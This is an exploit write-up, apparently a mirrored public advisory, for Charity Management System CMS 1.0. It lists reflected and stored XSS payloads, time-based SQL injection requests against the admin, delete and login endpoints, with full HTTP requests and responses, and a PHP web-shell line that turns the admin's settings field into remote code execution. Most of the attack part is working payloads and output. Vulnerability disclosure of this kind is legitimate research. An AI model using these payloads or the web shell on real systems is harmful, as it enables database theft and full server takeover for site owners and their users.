Exploit for Charity Management System CMS 1.0 Code Execution / XSS / SQL Injection

Name: Exploit for Charity Management System CMS 1.0 Code Execution / XSS / SQL Injection
Rating: 5 (217 reviews)
2021-08-19 | CVSS 0.6
## https://sploitus.com/exploit?id=PACKETSTORM:163879
# Exploit Title: Charity Management System CMS 1.0 - Multiple Vulnerabilities  
# Date: 18/08/2021  
# Exploit Author: Davide 't0rt3ll1n0' Taraschi  
# Vendor Homepage: https://www.sourcecodester.com/users/tips23  
# Software Link: https://www.sourcecodester.com/php/14908/simple-charity-website-management-system-cms-php-free-source-code.htmlpolice-crime-record-management-system.html  
# Version: 1.0  
# Testeted on: Linux (Ubuntu 20.04) using LAMPP  
  
  
## Unauthenticated reflected XSS  
# Vulnerable code in '/search.php' at line 44/45:  
<?php if($count_all <= 0): ?>  
<h4 class="text-center">No Article with "<?php echo $_GET['search'] ?>" keyword found.</h4>   
The content of the 'search' variable is printed on the page without being checked, leading to XSS  
# PoC  
Go to 'http://site.com/charity/' and in the search box input "<svg onload=alert(document.domain)>" without the double quotes, and a text box should appear  
  
  
## Authenticated stored XSS  
There is a stored XSS in '/charity/admin/maintenance/manage_topic.php' due to a failure to sanitize user input  
# Poc  
1) Login as admin  
2) Go to '/maintenance/manage_topic.php'  
3) In "description" insert "<svg onload=alert(document.domain)>" without the double quotes  
4) Click the "save" below  
5) An alert box should appear  
  
  
## POST Authenticated SQL Injection  
# Vulnerable code in '/charity/classes/Master.php' at line 67  
$del = $this->conn->query("DELETE FROM `topics` where id = '{$id}'");  
The $id variable is used without being checked, leading to SQLi  
# PoC  
Request:  
POST /charity/classes/Master.php?f=delete_topic HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 4  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/charity/admin/?page=maintenance/topics  
Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo  
  
Response after 5 seconds (the sleep has been executed)  
  
HTTP/1.1 200 OK  
Date: Wed, 18 Aug 2021 14:32:13 GMT  
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1  
X-Powered-By: PHP/7.4.22  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Access-Control-Allow-Origin: *  
Content-Length: 20  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
{"status":"success"}  
  
  
## GET Authenticated SQL Injection  
# Vulnerable code in '/charity/admin/maintenance/manage_topic.php' at line 2/3  
if(isset($_GET['id']) && $_GET['id'] > 0){  
$qry = $conn->query("SELECT * from `topics` where id = '{$_GET['id']}' ");  
...  
}  
As usual the 'id' variable is passed to the prepared statement without being checked, leading to (another) SQLi  
# PoC  
Similar to the previous one (same payload)  
  
  
## POST Unauthenticated SQL Injection  
# Vulnerable code in '/charity/classes/Login.php' at line 21  
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");  
The 'username' variable is passed without being sanificated, causing a SQLi  
# PoC  
Request:  
POST /charity/classes/Login.php?f=login HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: */*  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 84  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/charity/admin/login.php  
Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
username=username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo&password=password  
  
Response after 5 seconds (the sleep has been executed)  
  
HTTP/1.1 200 OK  
Date: Wed, 18 Aug 2021 14:48:18 GMT  
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1  
X-Powered-By: PHP/7.4.22  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Access-Control-Allow-Origin: *  
Content-Length: 164  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
{"status":"incorrect","last_qry":"SELECT * from users where username = 'username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo' and password = md5('password') "}  
  
  
## PHP Code Injection lead to Authenticated Remote Code Execution (RCE)  
# Vulnerable code in /charity/classes/SystemSettings.php at line 37  
$qry = $this->conn->query("UPDATE system_info set meta_value = '{$value}' where meta_field = '{$key}' ");  
The 'value' variable will be included in the homepage of the site without being checked, leading to RCE.  
# PoC  
1) Go to /charity/admin/system_info.php and in the "Welcome content" click on "Code View" at the top right.  
2) At the bottom of the html code enter the following code: <?php if(isset($_GET['cmd'])) {system($_GET['cmd']);} ?>  
3) Click the "update" button  
4) Go to the home page and at the end of the url tipe "?cmd=$cmd" without the double quotes and replacing $cmd with the command you want to execute  
5) The output should appear in the homepage